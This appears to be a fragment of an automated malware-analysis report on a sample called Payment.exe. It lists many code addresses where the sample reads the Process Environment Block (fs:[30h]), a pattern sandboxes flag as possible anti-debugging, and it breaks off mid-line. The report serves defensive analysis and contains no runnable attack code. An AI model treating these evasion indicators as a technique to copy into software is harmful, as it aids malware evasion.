      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h]0_2_03C8594B
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h]0_2_03C8594B
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h]0_2_03C8594B
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8214F mov eax, dword ptr fs:[00000030h]0_2_03C8214F
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C53158 mov ecx, dword ptr fs:[00000030h]0_2_03C53158
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C5B171 mov eax, dword ptr fs:[00000030h]0_2_03C5B171
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C5B171 mov eax, dword ptr fs:[00000030h]0_2_03C5B171
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C5B171 mov eax, dword ptr fs:[00000030h]0_2_03C5B171
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C5397E mov eax, dword ptr fs:[00000030h]0_2_03C5397E
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C5397E mov eax, dword ptr fs:[00000030h]0_2_03C5397E
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C5B101 mov eax, dword ptr fs:[00000030h]0_2_03C5B101
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C5B101 mov eax, dword ptr fs:[00000030h]0_2_03C5B101
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C54101 mov eax, dword ptr fs:[00000030h]0_2_03C54101
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C54101 mov eax, dword ptr fs:[00000030h]0_2_03C54101
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C54101 mov eax, dword ptr fs:[00000030h]0_2_03C54101
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C87110 mov eax, dword ptr fs:[00000030h]0_2_03C87110
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C87110 mov eax, dword ptr fs:[00000030h]0_2_03C87110
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C87110 mov eax, dword ptr fs:[00000030h]0_2_03C87110
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C6F11B mov eax, dword ptr fs:[00000030h]0_2_03C6F11B
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C6F11B mov eax, dword ptr fs:[00000030h]0_2_03C6F11B
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C6F11B mov eax, dword ptr fs:[00000030h]0_2_03C6F11B
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C6F11B mov eax, dword ptr fs:[00000030h]0_2_03C6F11B
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C6F11B mov eax, dword ptr fs:[00000030h]0_2_03C6F11B
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C6F11B mov eax, dword ptr fs:[00000030h]0_2_03C6F11B
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C6F11B mov eax, dword ptr fs:[00000030h]0_2_03C6F11B
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D2010D mov eax, dword ptr fs:[00000030h]0_2_03D2010D
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D2010D mov eax, dword ptr fs:[00000030h]0_2_03D2010D
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8A93B mov eax, dword ptr fs:[00000030h]0_2_03C8A93B
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C848CB mov eax, dword ptr fs:[00000030h]0_2_03C848CB
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C848CB mov eax, dword ptr fs:[00000030h]0_2_03C848CB
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C848CB mov eax, dword ptr fs:[00000030h]0_2_03C848CB
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D0F8C0 mov eax, dword ptr fs:[00000030h]0_2_03D0F8C0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C590D0 mov eax, dword ptr fs:[00000030h]0_2_03C590D0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C590D0 mov eax, dword ptr fs:[00000030h]0_2_03C590D0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C590D0 mov eax, dword ptr fs:[00000030h]0_2_03C590D0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D110CF mov eax, dword ptr fs:[00000030h]0_2_03D110CF
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C858EB mov eax, dword ptr fs:[00000030h]0_2_03C858EB
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C858EB mov eax, dword ptr fs:[00000030h]0_2_03C858EB
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D1B8F9 mov eax, dword ptr fs:[00000030h]0_2_03D1B8F9
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D1B8F9 mov eax, dword ptr fs:[00000030h]0_2_03D1B8F9
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C7E0E8 mov eax, dword ptr fs:[00000030h]0_2_03C7E0E8
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03CEF8F0 mov eax, dword ptr fs:[00000030h]0_2_03CEF8F0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03CEF8F0 mov eax, dword ptr fs:[00000030h]0_2_03CEF8F0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03CE2893 mov eax, dword ptr fs:[00000030h]0_2_03CE2893
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D150B3 mov eax, dword ptr fs:[00000030h]0_2_03D150B3
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D150B3 mov eax, dword ptr fs:[00000030h]0_2_03D150B3
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03CD40A7 mov eax, dword ptr fs:[00000030h]0_2_03CD40A7
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D208A5 mov eax, dword ptr fs:[00000030h]0_2_03D208A5
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D208A5 mov eax, dword ptr fs:[00000030h]0_2_03D208A5
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D208A5 mov eax, dword ptr fs:[00000030h]0_2_03D208A5
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C558BC mov eax, dword ptr fs:[00000030h]0_2_03C558BC
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8E845 mov eax, dword ptr fs:[00000030h]0_2_03C8E845
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C59050 mov eax, dword ptr fs:[00000030h]0_2_03C59050
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D1A844 mov eax, dword ptr fs:[00000030h]0_2_03D1A844
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D1A844 mov eax, dword ptr fs:[00000030h]0_2_03D1A844
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C6F050 mov eax, dword ptr fs:[00000030h]0_2_03C6F050
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C6F050 mov eax, dword ptr fs:[00000030h]0_2_03C6F050
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C7E067 mov eax, dword ptr fs:[00000030h]0_2_03C7E067
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C7E067 mov eax, dword ptr fs:[00000030h]0_2_03C7E067
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03CEF867 mov eax, dword ptr fs:[00000030h]0_2_03CEF867
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C7F076 mov eax, dword ptr fs:[00000030h]0_2_03C7F076
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C7F076 mov eax, dword ptr fs:[00000030h]0_2_03C7F076
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C7F076 mov eax, dword ptr fs:[00000030h]0_2_03C7F076
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C7F076 mov eax, dword ptr fs:[00000030h]0_2_03C7F076
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C7F076 mov eax, dword ptr fs:[00000030h]0_2_03C7F076
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C72073 mov eax, dword ptr fs:[00000030h]0_2_03C72073
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C82870 mov eax, dword ptr fs:[00000030h]0_2_03C82870
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C74800 mov eax, dword ptr fs:[00000030h]0_2_03C74800
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C74800 mov eax, dword ptr fs:[00000030h]0_2_03C74800
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C74800 mov eax, dword ptr fs:[00000030h]0_2_03C74800
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C74800 mov eax, dword ptr fs:[00000030h]0_2_03C74800
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D11008 mov eax, dword ptr fs:[00000030h]0_2_03D11008
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C6A01A mov eax, dword ptr fs:[00000030h]0_2_03C6A01A
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C6A01A mov eax, dword ptr fs:[00000030h]0_2_03C6A01A
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C6A01A mov eax, dword ptr fs:[00000030h]0_2_03C6A01A
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C6A01A mov eax, dword ptr fs:[00000030h]0_2_03C6A01A
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C57025 mov eax, dword ptr fs:[00000030h]0_2_03C57025
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C80021 mov eax, dword ptr fs:[00000030h]0_2_03C80021
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C80021 mov eax, dword ptr fs:[00000030h]0_2_03C80021
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C80021 mov eax, dword ptr fs:[00000030h]0_2_03C80021
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C80021 mov eax, dword ptr fs:[00000030h]0_2_03C80021
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D0F83F mov eax, dword ptr fs:[00000030h]0_2_03D0F83F
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C94030 mov eax, dword ptr fs:[00000030h]0_2_03C94030
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C5383B mov eax, dword ptr fs:[00000030h]0_2_03C5383B
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C5383B mov eax, dword ptr fs:[00000030h]0_2_03C5383B
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D0F7D3 mov eax, dword ptr fs:[00000030h]0_2_03D0F7D3
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03CD67C9 mov eax, dword ptr fs:[00000030h]0_2_03CD67C9
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03CD67C9 mov eax, dword ptr fs:[00000030h]0_2_03CD67C9
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03CD67C9 mov eax, dword ptr fs:[00000030h]0_2_03CD67C9
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03CD67C9 mov ecx, dword ptr fs:[00000030h]0_2_03CD67C9
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03CD67C9 mov eax, dword ptr fs:[00000030h]0_2_03CD67C9
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03CD67C9 mov eax, dword ptr fs:[00000030h]0_2_03CD67C9
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C52FD0 mov eax, dword ptr fs:[00000030h]0_2_03C52FD0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C52FD0 mov eax, dword ptr fs:[00000030h]0_2_03C52FD0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C52FD0 mov eax, dword ptr fs:[00000030h]0_2_03C52FD0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C52FD0 mov ecx, dword ptr fs:[00000030h]0_2_03C52FD0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C52FD0 mov eax, dword ptr fs:[00000030h]0_2_03C52FD0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C52FD0 mov eax, dword ptr fs:[00000030h]0_2_03C52FD0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C52FD0 mov eax, dword ptr fs:[00000030h]0_2_03C52FD0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C52FD0 mov eax, dword ptr fs:[00000030h]0_2_03C52FD0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C52FD0 mov eax, dword ptr fs:[00000030h]0_2_03C52FD0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C52FD0 mov eax, dword ptr fs:[00000030h]0_2_03C52FD0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C52FD0 mov eax, dword ptr fs:[00000030h]0_2_03C52FD0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C53FE5 mov eax, dword ptr fs:[00000030h]0_2_03C53FE5
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C53FE5 mov eax, dword ptr fs:[00000030h]0_2_03C53FE5
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C53FE5 mov eax, dword ptr fs:[00000030h]0_2_03C53FE5
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D087F1 mov eax, dword ptr fs:[00000030h]0_2_03D087F1
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D1F7E2 mov eax, dword ptr fs:[00000030h]0_2_03D1F7E2
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D1F7E2 mov eax, dword ptr fs:[00000030h]0_2_03D1F7E2
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D1F7E2 mov eax, dword ptr fs:[00000030h]0_2_03D1F7E2
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D1F7E2 mov eax, dword ptr fs:[00000030h]0_2_03D1F7E2
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C847FD mov esi, dword ptr fs:[00000030h]0_2_03C847FD
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C847FD mov eax, dword ptr fs:[00000030h]0_2_03C847FD
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C847FD mov eax, dword ptr fs:[00000030h]0_2_03C847FD
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C67781 mov eax, dword ptr fs:[00000030h]0_2_03C67781
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D1AF81 mov eax, dword ptr fs:[00000030h]0_2_03D1AF81
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D1AF81 mov eax, dword ptr fs:[00000030h]0_2_03D1AF81
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D1AF81 mov eax, dword ptr fs:[00000030h]0_2_03D1AF81
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D1AF81 mov eax, dword ptr fs:[00000030h]0_2_03D1AF81
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D12782 mov eax, dword ptr fs:[00000030h]0_2_03D12782
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D12782 mov eax, dword ptr fs:[00000030h]0_2_03D12782
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D12782 mov eax, dword ptr fs:[00000030h]0_2_03D12782
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D12782 mov eax, dword ptr fs:[00000030h]0_2_03D12782
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D12782 mov eax, dword ptr fs:[00000030h]0_2_03D12782
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D12782 mov eax, dword ptr fs:[00000030h]0_2_03D12782
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D12782 mov eax, dword ptr fs:[00000030h]0_2_03D12782
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C75790 mov eax, dword ptr fs:[00000030h]0_2_03C75790
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C75790 mov ecx, dword ptr fs:[00000030h]0_2_03C75790
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C75790 mov ecx, dword ptr fs:[00000030h]0_2_03C75790
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C75790 mov eax, dword ptr fs:[00000030h]0_2_03C75790
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C75790 mov ecx, dword ptr fs:[00000030h]0_2_03C75790
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C75790 mov ecx, dword ptr fs:[00000030h]0_2_03C75790
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C75790 mov eax, dword ptr fs:[00000030h]0_2_03C75790
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C75790 mov eax, dword ptr fs:[00000030h]0_2_03C75790
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C75790 mov eax, dword ptr fs:[00000030h]0_2_03C75790
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C75790 mov eax, dword ptr fs:[00000030h]0_2_03C75790
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C75790 mov eax, dword ptr fs:[00000030h]0_2_03C75790
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C75790 mov eax, dword ptr fs:[00000030h]0_2_03C75790
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C75790 mov eax, dword ptr fs:[00000030h]0_2_03C75790
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C75790 mov eax, dword ptr fs:[00000030h]0_2_03C75790
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C75790 mov eax, dword ptr fs:[00000030h]0_2_03C75790
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C75790 mov eax, dword ptr fs:[00000030h]0_2_03C75790
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C75790 mov eax, dword ptr fs:[00000030h]0_2_03C75790
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C75790 mov eax, dword ptr fs:[00000030h]0_2_03C75790
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C75790 mov eax, dword ptr fs:[00000030h]0_2_03C75790
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C7E79A mov eax, dword ptr fs:[00000030h]0_2_03C7E79A
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C7A7B6 mov eax, dword ptr fs:[00000030h]0_2_03C7A7B6
      Source: C:\Users\user\Desktop\Payment.exe